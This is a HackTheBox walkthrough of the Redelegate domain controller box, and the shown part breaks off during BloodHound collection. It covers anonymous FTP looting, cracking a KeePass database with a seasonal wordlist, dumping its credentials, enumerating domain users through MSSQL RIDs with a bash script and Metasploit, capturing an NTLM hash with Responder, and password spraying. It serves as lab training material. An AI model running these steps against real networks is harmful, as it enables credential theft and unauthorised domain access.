HTB: Redelegate
I’ll find files on an open FTP server to start Redelegate. These files include the results of a security audit and a shared KeePass database. I’ll crack the password and get access to MSSQL, where I can enumerate domain users. Then I’ll password spray to get a foothold on the domain. That user is in the helpdesk group and can reset another user’s password, providing WinRM access to the host. From there I’ll abuse SeEnableDelegationPrivilege to configure a computer with constrained delegation in an exploitable manner.
Box Info
| Name | Redelegate  Play on HackTheBox |
|---|---|
| Release Date | 17 Jul 2025 |
| Retire Date | 17 Jul 2025 |
| OS | Windows  |
| Base Points | Hard [40] |
 |
N/A (non-competitive) |
 |
N/A (non-competitive) |
| Creator |  |
Recon
Initial Scanning
nmap finds many open TCP ports:
oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.234.50
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-12 17:37 UTC
Initiating Ping Scan at 17:37
...[snip]...
Completed SYN Stealth Scan at 17:37, 8.42s elapsed (65535 total ports)
Nmap scan report for 10.129.234.50
Host is up, received reset ttl 127 (0.093s latency).
Scanned at 2025-07-12 17:37:02 UTC for 9s
Not shown: 65503 closed tcp ports (reset)
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 127
53/tcp open domain syn-ack ttl 127
80/tcp open http syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5357/tcp open wsdapi syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49932/tcp open unknown syn-ack ttl 127
54861/tcp open unknown syn-ack ttl 127
59350/tcp open unknown syn-ack ttl 127
59351/tcp open unknown syn-ack ttl 127
59357/tcp open unknown syn-ack ttl 127
59361/tcp open unknown syn-ack ttl 127
59376/tcp open unknown syn-ack ttl 127
59379/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 8.61 seconds
Raw packets sent: 82423 (3.627MB) | Rcvd: 65536 (2.622MB)
oxdf@hacky$ nmap -p 21,53,80,88,135,139,389,445,464,593,636,1433,3268,3269,3389,5357,5985,9389,47001 -sCV 10.129.234.50
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-12 17:38 UTC
Nmap scan report for 10.129.234.50
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24 01:11AM 434 CyberAudit.txt
| 10-20-24 05:14AM 2622 Shared.kdbx
|_10-20-24 01:26AM 580 TrainingAgenda.txt
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-12 17:54:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-07-12T12:26:36
|_Not valid after: 2055-07-12T12:26:36
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-07-12T17:55:00+00:00; +15m59s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: redelegate.vl
| DNS_Computer_Name: dc.redelegate.vl
| DNS_Tree_Name: redelegate.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-07-12T17:54:50+00:00
|_ssl-date: 2025-07-12T17:55:00+00:00; +15m59s from scanner time.
| ssl-cert: Subject: commonName=dc.redelegate.vl
| Not valid before: 2025-04-09T10:21:45
|_Not valid after: 2025-10-09T10:21:45
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-12T17:54:51
|_ start_date: N/A
|_clock-skew: mean: 15m58s, deviation: 0s, median: 15m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.29 seconds
The box shows many of the ports associated with a Windows Domain Controller. The domain is redelegate.vl, and the hostname is DC. I’ll use netexec to generate a line for my hosts file:
oxdf@hacky$ netexec smb 10.129.234.50 --generate-hosts-file hosts
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
oxdf@hacky$ cat hosts
10.129.234.50 DC.redelegate.vl redelegate.vl DC
oxdf@hacky$ cat hosts /etc/hosts | sponge /etc/hosts
There’s also a bunch of non DC ports:
- FTP (TCP 21) -
nmapcalls out anonymous auth is allowed and gives a list of files. - HTTP (TCP 80) - Will need full enumeration.
- MSSQL (TCP 1433) - Likely need creds.
- RDP (TCP 3389) - Likely need creds.
- WinRM (TCP 5985) - Need creds.
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
Website - TCP 80
Site
The website is just the default IIS page:
Tech Stack
The HTTP response headers are standard IIS:
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 19 Oct 2024 09:50:25 GMT
Accept-Ranges: bytes
ETag: "cd7f5c52c22db1:0"
Server: Microsoft-IIS/10.0
Date: Sun, 13 Jul 2025 21:30:08 GMT
Content-Length: 703
The 404 page is default IIS as well:
Directory Brute Force
I’ll run feroxbuster against the site using a lowercase wordlist (as it’s IIS):
oxdf@hacky$ feroxbuster -u http://10.129.234.50 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.234.50
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 334l 2089w 180418c http://10.129.234.50/iisstart.png
200 GET 32l 55w 703c http://10.129.234.50/
400 GET 6l 26w 324c http://10.129.234.50/error%1F_log
[####################] - 50s 26587/26587 0s found:3 errors:0
[####################] - 50s 26584/26584 533/s http://10.129.234.50/
Nothing at all.
SMB - TCP 445
I’m not able to get authenticated using guest or anonymous auth:
oxdf@hacky$ netexec smb dc.redelegate.vl -u guest -p ''
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.50 445 DC [-] redelegate.vl\guest: STATUS_ACCOUNT_DISABLED
oxdf@hacky$ netexec smb dc.redelegate.vl -u oxdf -p ''
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.50 445 DC [-] redelegate.vl\oxdf: STATUS_LOGON_FAILURE
I’ll have to come back when I get creds.
FTP - TCP 21
Collection
nmap already shows that anonymous authentication works for this FTP server. I’ll connect, giving an empty password:
oxdf@hacky$ ftp anonymous@dc.redelegate.vl
Connected to DC.redelegate.vl.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49863|)
125 Data connection already open; Transfer starting.
10-20-24 01:11AM 434 CyberAudit.txt
10-20-24 05:14AM 2622 Shared.kdbx
10-20-24 01:26AM 580 TrainingAgenda.txt
226 Transfer complete.
There are three files. I’ll download them:
ftp> binary
200 Type set to I.
ftp> prompt off
Interactive mode off.
ftp> mget *
local: CyberAudit.txt remote: CyberAudit.txt
229 Entering Extended Passive Mode (|||56198|)
125 Data connection already open; Transfer starting.
100% |******************************************************************************************| 434 4.56 KiB/s 00:00 ETA
226 Transfer complete.
434 bytes received in 00:00 (4.55 KiB/s)
local: Shared.kdbx remote: Shared.kdbx
229 Entering Extended Passive Mode (|||56199|)
125 Data connection already open; Transfer starting.
100% |******************************************************************************************| 2622 27.34 KiB/s 00:00 ETA 226 Transfer complete.
2622 bytes received in 00:00 (27.28 KiB/s)
local: TrainingAgenda.txt remote: TrainingAgenda.txt
229 Entering Extended Passive Mode (|||56200|)
125 Data connection already open; Transfer starting.
100% |******************************************************************************************| 580 6.11 KiB/s 00:00 ETA
226 Transfer complete.
580 bytes received in 00:00 (6.09 KiB/s)
It’s important to put FTP into binary mode before transferring, or the binary Keepass DB can be messed up.
Files
CyberAudit.txt has findings from a recent audit:
OCTOBER 2024 AUDIT FINDINGS
[!] CyberSecurity Audit findings:
1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs
[*] Remediation steps:
1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESS
Nothing super useful as far as next steps.
TrainingAgenda.txt has some upcoming events:
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)
Friday 4th October | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one
Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?
Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password
Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them
Based on the dates for those Fridays the year is likely 2024 (or maybe 2019):
There is a hint here about “SeasonYear!” being used as a password.
The last file is a KeePass database:
oxdf@hacky$ file Shared.kdbx
Shared.kdbx: Keepass password database 2.x KDBX
Auth as Marie.Curie
Access Shared.kdbx
Generate Hash
I’ll use the john tool keepass2john to generate a hash that can be brute-forced:
oxdf@hacky$ /opt/john/run/keepass2john Shared.kdbx | tee Shared.kdbx.hash
Shared:$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*9dd2081c364e66a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca4e19
This doesn’t crack with hashcat and rockyou.txt in any reasonable amount of time.
Seasons Wordlist
I’ll make a short wordlist of the pattern mentioned above:
Winter2024!
Spring2024!
Summer2024!
Fall2024!
Autumn2024!
I’m starting with 2024 since that’s the year of the dates on the box. If this doesn’t work, I can try adding more years.
hashcat autodetect gives two possible options for the hash:
$ hashcat Shared.kdbx.hash seasons --user
hashcat (v6.2.6) starting in autodetect mode
...[snip]...
The following 2 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) | Password Manager
29700 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) - keyfile only mode | Password Manager
Please specify the hash-mode with -m [hash-mode].
I’ll start with the one that doesn’t require a keyfile, and it cracks:
$ hashcat Shared.kdbx.hash seasons --user -m 13400
hashcat (v6.2.6) starting
...[snip]...
$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b
4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*806f9dd2081c364e6
6a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca:Fall2024!
...[snip]...
The password is “Fall2024!”.
Dump Credentials
keepassxc.cli can dump the full DB in one command line:
oxdf@hacky$ echo 'Fall2024!' | keepassxc.cli export Shared.kdbx --format csv
Enter password to unlock Shared.kdbx:
KdbxXmlReader::readDatabase: found 1 invalid group reference(s)
"Group","Title","Username","Password","URL","Notes","TOTP","Icon","Last Modified","Created"
"Shared/IT","FTP","FTPUser","SguPZBKdRyxWzvXRWy6U","","Deprecated","","0","2024-10-20T07:56:58Z","2024-10-20T07:56:20Z"
"Shared/IT","FS01 Admin","Administrator","Spdv41gg4BlBgSYIW1gF","","","","0","2024-10-20T07:57:21Z","2024-10-20T07:57:02Z"
"Shared/IT","WEB01","WordPress Panel","cn4KOEgsHqvKXPjEnSD9","","","","0","2024-10-20T08:00:25Z","2024-10-20T07:57:24Z"
"Shared/IT","SQL Guest Access","SQLGuest","zDPBpaF4FywlqIv11vii","","","","0","2024-10-20T08:27:09Z","2024-10-20T08:26:48Z"
"Shared/HelpDesk","KeyFob Combination","","22331144","","","","0","2024-10-20T12:12:32Z","2024-10-20T12:12:09Z"
"Shared/Finance","Timesheet Manager","Timesheet","hMFS4I0Kj8Rcd62vqi5X","","","","0","2024-10-20T12:14:18Z","2024-10-20T12:13:30Z"
"Shared/Finance","Payrol App","Payroll","cVkqz4bCM7kJRSNlgx2G","","","","0","2024-10-20T12:14:11Z","2024-10-20T12:13:50Z"
MSSQL
Validate Creds
Most of the creds don’t seem valid to anything I have access to at this point. The MSSQL creds do not work for SMB or as a Windows account:
oxdf@hacky$ netexec smb dc.redelegate.vl -u SQLGuest -p zDPBpaF4FywlqIv11vii
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.50 445 DC [-] redelegate.vl\SQLGuest:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
But with the --local-auth flag, they do work for the DB:
oxdf@hacky$ netexec mssql dc.redelegate.vl -u SQLGuest -p zDPBpaF4FywlqIv11vii
MSSQL 10.129.234.50 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.234.50 1433 DC [-] redelegate.vl\SQLGuest:zDPBpaF4FywlqIv11vii (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication. Please try again with or without '--local-auth')
oxdf@hacky$ netexec mssql dc.redelegate.vl -u SQLGuest -p zDPBpaF4FywlqIv11vii --local-auth
MSSQL 10.129.234.50 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
MSSQL 10.129.234.50 1433 DC [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii
Content
I’ll connect with mssqlclient.py from Impacket:
oxdf@hacky$ mssqlclient.py SQLGuest:zDPBpaF4FywlqIv11vii@dc.redelegate.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SQLGuest guest@master)>
The databases are just the default MSSQL databases:
SQL (SQLGuest guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
There’s no interesting data here.
Rabbit Holes
There are a couple directions I did go down that led to deadends. First, it’s always worth checking for the ability to run xp_cmdshell. mssqlclient.py has commands to use and enable it built in:
SQL (SQLGuest guest@master)> xp_cmdshell whoami
ERROR(DC\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (SQLGuest guest@master)> enable_xp_cmdshell
ERROR(DC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(DC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
It’s not enabled and this account can’t enable it.
I can try to read files using xp_dirtree, but no luck there either. I can use xp_dirtree to request a file from an SMB share on my host, and capture the NetNTLMv2 challenge / response with Responder:
[SMB] NTLMv2-SSP Client : 10.129.234.50
[SMB] NTLMv2-SSP Username : REDELEGATE\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::REDELEGATE:d0655c4d301c1bef:F1B3C3DBDCFE65136BCB078018AAD143:010100000000000000B1F3BB8FF5DB01929B3D1EA6B6AF300000000002000800440050005400540001001E00570049004E002D003800370045003200410041004F00360058005800300004003400570049004E002D003800370045003200410041004F0036005800580030002E0044005000540054002E004C004F00430041004C000300140044005000540054002E004C004F00430041004C000500140044005000540054002E004C004F00430041004C000700080000B1F3BB8FF5DB010600040002000000080030003000000000000000000000000030000053950BC1AD352553C652D8F0C1D82D93B7BB9CF751AA930283C53705B9B213590A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00370039000000000000000000
I wasn’t able to crack this.
Manual Enumerate Domain Accounts
This post from NetSPI goes into different ways to enumerate an MSSQL server. Four sections are on enumerating domain accounts. I’ll show two of these.
To manually do it, I’ll first confirm the domain name:
SQL (SQLGuest guest@master)> select DEFAULT_DOMAIN() as mydomain;
mydomain
----------
REDELEGATE
Now I need to get the domain SID. They suggest using the Domain Admins group:
SQL (SQLGuest guest@master)> select SUSER_SID('REDELEGATE\Domain Admins')
-----------------------------------------------------------
b'010500000000000515000000a185deefb22433798d8e847a00020000'
Every object in the domain will have the same start of the SID, where as the 00020000 is the RID specific to this group. So the base of the SID for this domain is 010500000000000515000000a185deefb22433798d8e847a.
The administrator RID is typically 500, which converts to hex as 0x1f4. I’ll need to swap the byte order and pad this out with 0s to get the administrator SID, which I can check via MSSQL:
SQL (SQLGuest guest@master)> select SUSER_SNAME(0x010500000000000515000000a185deefb22433798d8e847aF4010000);
-----------------------------
WIN-Q13O908QBPG\Administrator
I’ll write a bash script to try this for each user with RID between 1000 and 1500:
#!/bin/bash
SID_BASE="010500000000000515000000a185deefb22433798d8e847a"
for RID in {1000..1500}; do
HEX_RID=$(python -c "import struct; print(struct.pack('<I', ${RID}).hex())")
SID="${SID_BASE}${HEX_RID}"
RES=$(mssqlclient.py SQLGuest:zDPBpaF4FywlqIv11vii@dc.redelegate.vl -file <( echo "select SUSER_SNAME(0x${SID});") 2>&1 | sed -n '/^----/{n;p;}')
echo -n $'\r'"${RID}: ${RES}"
[[ "$(echo "$RES" | xargs)" != "NULL" ]] && echo
done
This uses Python to convert the int to the little-endian hex. It prints the result and only if the result isn’t null does it print a newline so I can watch the progress as it runs. I takes a few minutes, but finds a bunch of accounts:
oxdf@hacky$ time ./mssql_rid_brute.sh
1000: REDELEGATE\SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
1002: REDELEGATE\DC$
1103: REDELEGATE\FS01$
1104: REDELEGATE\Christine.Flanders
1105: REDELEGATE\Marie.Curie
1106: REDELEGATE\Helen.Frost
1107: REDELEGATE\Michael.Pontiac
1108: REDELEGATE\Mallory.Roberts
1109: REDELEGATE\James.Dinkleberg
1112: REDELEGATE\Helpdesk
1113: REDELEGATE\IT
1114: REDELEGATE\Finance
1115: REDELEGATE\DnsAdmins
1116: REDELEGATE\DnsUpdateProxy
1117: REDELEGATE\Ryan.Cooper
1119: REDELEGATE\sql_svc
1500: NULL
real 6m56.249s
user 1m11.300s
sys 0m21.296s
Update July 18 2025: Pyp on Discord reached out to me on Discord to suggest speeding this script using multiprocessing. The basic trick is to make a function that checks a specific RID, and then call that using xargs with the -P argument to run many instances of that function in parallel. I can update my version to:
#!/bin/bash
check_rid() {
SID_BASE="010500000000000515000000a185deefb22433798d8e847a"
local RID=$1
local HEX_RID=$(python -c "import struct; print(struct.pack('<I', ${RID}).hex())")
local SID="${SID_BASE}${HEX_RID}"
local RES=$(mssqlclient.py SQLGuest:zDPBpaF4FywlqIv11vii@dc.redelegate.vl -file <( echo "select SUSER_SNAME(0x${SID});") 2>&1 | sed -n '/^----/{n;p;}')
if [[ "$(echo "$RES" | xargs)" != "NULL" ]]; then echo "${RID}: ${RES}"; fi
}
export -f check_rid
seq 1000 1500 | xargs -P 48 -I{} bash -c 'check_rid $@' _ {}
I make the variables local so they don’t risk stepping on each other (I’m not 100% sure that’s necessary, but can’t hurt). I export the function so it’s available outside the script.
The last line generates the numbers 1000 to 1500 using seq, which are passed into xargs. -I{} tells it to replace {} with each value in that list. Then it calls for each item bash -c 'check_rid $@', where $@ is all the input args, and those args are _ {}. _ is a placeholder for the script name. {} will be the value I want to pass into check_rid. This runs much faster:
oxdf@hacky$ time ./mssql_rid_brute_parallel.sh
1000: REDELEGATE\SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
1002: REDELEGATE\DC$
1105: REDELEGATE\Marie.Curie
1104: REDELEGATE\Christine.Flanders
1108: REDELEGATE\Mallory.Roberts
1103: REDELEGATE\FS01$
1109: REDELEGATE\James.Dinkleberg
1106: REDELEGATE\Helen.Frost
1107: REDELEGATE\Michael.Pontiac
1112: REDELEGATE\Helpdesk
1113: REDELEGATE\IT
1114: REDELEGATE\Finance
1115: REDELEGATE\DnsAdmins
1116: REDELEGATE\DnsUpdateProxy
1117: REDELEGATE\Ryan.Cooper
1119: REDELEGATE\sql_svc
real 0m13.185s
user 1m44.011s
sys 0m24.331s
Using 48 processes works for me, as my VM has 12 processors available to it, and this is network bound process. Trying for any more runs into the limits of Redelegate.
Enumerate Domain Accounts w/ Metasploit
Metasploit has a module to do this enumeration:
oxdf@hacky$ msfconsole
...[snip]...
msf6 > use auxiliary/admin/mssql/mssql_enum_domain_accounts
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) >
I’ll set the options:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > options
Module options (auxiliary/admin/mssql/mssql_enum_domain_accounts):
Name Current Setting Required Description
---- --------------- -------- -----------
FuzzNum 10000 yes Number of principal_ids to fuzz.
PASSWORD zDPBpaF4FywlqIv11vii no The password for the specified username
RHOSTS dc.redelegate.vl yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas
ics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
USERNAME SQLGuest no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentication (requires DOMAIN option set)
This runs much faster:
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.129.234.50
[*] 10.129.234.50:1433 - Attempting to connect to the database server at 10.129.234.50:1433 as SQLGuest...
[+] 10.129.234.50:1433 - Connected.
[*] 10.129.234.50:1433 - SQL Server Name: WIN-Q13O908QBPG
[*] 10.129.234.50:1433 - Domain Name: REDELEGATE
[+] 10.129.234.50:1433 - Found the domain sid: 010500000000000515000000a185deefb22433798d8e847a
[*] 10.129.234.50:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.129.234.50:1433 - - WIN-Q13O908QBPG\Administrator
[*] 10.129.234.50:1433 - - REDELEGATE\Guest
[*] 10.129.234.50:1433 - - REDELEGATE\krbtgt
[*] 10.129.234.50:1433 - - REDELEGATE\Domain Admins
[*] 10.129.234.50:1433 - - REDELEGATE\Domain Users
[*] 10.129.234.50:1433 - - REDELEGATE\Domain Guests
[*] 10.129.234.50:1433 - - REDELEGATE\Domain Computers
[*] 10.129.234.50:1433 - - REDELEGATE\Domain Controllers
[*] 10.129.234.50:1433 - - REDELEGATE\Cert Publishers
[*] 10.129.234.50:1433 - - REDELEGATE\Schema Admins
[*] 10.129.234.50:1433 - - REDELEGATE\Enterprise Admins
[*] 10.129.234.50:1433 - - REDELEGATE\Group Policy Creator Owners
[*] 10.129.234.50:1433 - - REDELEGATE\Read-only Domain Controllers
[*] 10.129.234.50:1433 - - REDELEGATE\Cloneable Domain Controllers
[*] 10.129.234.50:1433 - - REDELEGATE\Protected Users
[*] 10.129.234.50:1433 - - REDELEGATE\Key Admins
[*] 10.129.234.50:1433 - - REDELEGATE\Enterprise Key Admins
[*] 10.129.234.50:1433 - - REDELEGATE\RAS and IAS Servers
[*] 10.129.234.50:1433 - - REDELEGATE\Allowed RODC Password Replication Group
[*] 10.129.234.50:1433 - - REDELEGATE\Denied RODC Password Replication Group
[*] 10.129.234.50:1433 - - REDELEGATE\SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
[*] 10.129.234.50:1433 - - REDELEGATE\DC$
[*] 10.129.234.50:1433 - - REDELEGATE\FS01$
[*] 10.129.234.50:1433 - - REDELEGATE\Christine.Flanders
[*] 10.129.234.50:1433 - - REDELEGATE\Marie.Curie
[*] 10.129.234.50:1433 - - REDELEGATE\Helen.Frost
[*] 10.129.234.50:1433 - - REDELEGATE\Michael.Pontiac
[*] 10.129.234.50:1433 - - REDELEGATE\Mallory.Roberts
[*] 10.129.234.50:1433 - - REDELEGATE\James.Dinkleberg
[*] 10.129.234.50:1433 - - REDELEGATE\Helpdesk
[*] 10.129.234.50:1433 - - REDELEGATE\IT
[*] 10.129.234.50:1433 - - REDELEGATE\Finance
[*] 10.129.234.50:1433 - - REDELEGATE\DnsAdmins
[*] 10.129.234.50:1433 - - REDELEGATE\DnsUpdateProxy
[*] 10.129.234.50:1433 - - REDELEGATE\Ryan.Cooper
[*] 10.129.234.50:1433 - - REDELEGATE\sql_svc
Password Spray
I’ll make a users list and spray it with the seasons list:
oxdf@hacky$ netexec smb dc.redelegate.vl -u users -p seasons --continue-on-success | grep -v STATUS_LOGON_FAILURE
SMB 10.129.234.50 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.129.234.50 445 DC [-] redelegate.vl\Mallory.Roberts:Winter2024! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.234.50 445 DC [-] redelegate.vl\Mallory.Roberts:Spring2024! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.234.50 445 DC [-] redelegate.vl\Mallory.Roberts:Summer2024! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.234.50 445 DC [+] redelegate.vl\Marie.Curie:Fall2024!
SMB 10.129.234.50 445 DC [-] redelegate.vl\Mallory.Roberts:Fall2024! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.234.50 445 DC [-] redelegate.vl\Mallory.Roberts:Autumn2024! STATUS_ACCOUNT_RESTRICTION
Two interesting users:
- Mallory.Roberts gets
STATUS_ACCOUNT_RESTRICTION. If I try again with-kfor this user, it showsKDC_ERR_PREAUTH_FAILED, which means the password is bad. It’s worth noting this is some kind of privileged account. - “Fall2024!” works for Marie.Curie!
Shell as Helen.Frost
Enumeration
I’ll use these creds to get Bloodhound data with RustHound-CE:
oxdf@hacky$ rusthound-ce --domain redelegate.vl -u marie.curie -p 'Fall2024!' --zip
---------------------------------------------------
Initializing RustHound-CE at 15:01:51 on 07/15/25
Powered by @g0h4n_0
---------------------------------------------------
[2025-07-15T15:01:51Z INFO rusthound_ce] Verbosity level: Info
[2025-07-15T15:01:51Z INFO rusthound_ce] Collection method: All
[2025-07-15T15:01:52Z INFO rusthound_ce::ldap] Connected to REDELEGATE.VL Active Directory!
[2025-07-15T15:01:52Z INFO rusthound_ce::ldap] Starting data collection...
[2025-07-15T15:01:52Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
